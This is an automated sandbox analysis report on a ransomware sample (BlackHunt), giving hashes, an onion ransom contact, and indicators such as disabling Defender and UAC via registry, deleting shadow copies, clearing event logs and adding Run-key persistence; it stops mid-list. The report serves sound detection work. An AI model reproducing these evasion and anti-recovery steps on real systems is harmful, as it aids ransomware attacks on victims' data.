Analysis
-
max time kernel
131s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18-01-2024 23:53
Static task
static1
Behavioral task
behavioral1
Sample
7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe
Resource
win10v2004-20231222-en
General
-
Target
7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe
-
Size
707KB
-
MD5
96b663332c3602bbf4bf412f18d0ac71
-
SHA1
68b1fbd4978706baa0daa5e9cfbb301c8828114c
-
SHA256
7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf
-
SHA512
44463d2b15da99bb29df0e8ec18fbb4e91a4966fd723c39244a37c1ea701ff8e23a4726bfe4182df69a171c2b5382441d4f065061292212a146af81f869a3209
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza148Kvnh:6uaTmkZJ+naie5OTamgEoKxLWrEh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6996 fsutil.exe 5828 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 14420 wevtutil.exe 6872 wevtutil.exe 2124 wevtutil.exe 8212 wevtutil.exe 6460 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8348 bcdedit.exe 7212 bcdedit.exe 1440 bcdedit.exe 5912 bcdedit.exe -
Renames multiple (3365) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5456 wbadmin.exe 18708 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\K: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\Q: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\G: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\J: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\N: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\E: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\U: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\X: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\V: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\B: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\H: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\M: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\I: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\O: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\P: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\S: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\Y: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\L: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\Z: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened (read-only) \??\T: 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ar-ae\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\help.svg 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\root\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\rhp_world_icon_hover_2x.png 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\hscroll-thumb.png 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\eu-es\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-sl\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\#BlackHunt_Private.key 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-sl\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\ui-strings.js 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#BlackHunt_ReadMe.txt 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\files\#BlackHunt_ReadMe.hta 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 11548 10336 WerFault.exe 291 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1776 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4376 vssadmin.exe 1680 vssadmin.exe 7380 vssadmin.exe 7248 vssadmin.exe 1304 vssadmin.exe 1396 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 11188 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 vssadmin.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ vssadmin.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 11248 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Token: SeRestorePrivilege 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Token: SeBackupPrivilege 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Token: SeTakeOwnershipPrivilege 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Token: SeAuditPrivilege 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Token: SeSecurityPrivilege 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Token: SeIncBasePriorityPrivilege 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe Token: SeBackupPrivilege 5916 vssvc.exe Token: SeRestorePrivilege 5916 vssvc.exe Token: SeAuditPrivilege 5916 vssvc.exe Token: SeBackupPrivilege 8372 wbengine.exe Token: SeRestorePrivilege 8372 wbengine.exe Token: SeSecurityPrivilege 8372 wbengine.exe Token: SeSecurityPrivilege 14420 wevtutil.exe Token: SeBackupPrivilege 14420 wevtutil.exe Token: SeSecurityPrivilege 6460 wevtutil.exe Token: SeBackupPrivilege 6460 wevtutil.exe Token: SeSecurityPrivilege 6872 wevtutil.exe Token: SeBackupPrivilege 6872 wevtutil.exe Token: SeSecurityPrivilege 2124 wevtutil.exe Token: SeBackupPrivilege 2124 wevtutil.exe Token: SeSecurityPrivilege 8212 wevtutil.exe Token: SeBackupPrivilege 8212 wevtutil.exe Token: SeDebugPrivilege 11188 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2632 wrote to memory of 3060 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 92 PID 2632 wrote to memory of 3060 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 92 PID 2632 wrote to memory of 2988 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 95 PID 2632 wrote to memory of 2988 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 95 PID 2632 wrote to memory of 3260 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 96 PID 2632 wrote to memory of 3260 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 96 PID 2632 wrote to memory of 3836 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 98 PID 2632 wrote to memory of 3836 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 98 PID 2632 wrote to memory of 4144 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 100 PID 2632 wrote to memory of 4144 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 100 PID 2632 wrote to memory of 4692 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 103 PID 2632 wrote to memory of 4692 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 103 PID 2632 wrote to memory of 2496 2632 7ca83e1eebb5e47c3dc03d638729fbb9243b6106f9ea8c5d252f198997bb3aaf.exe 104 PID 2632 wrote to memory of 2496 2632 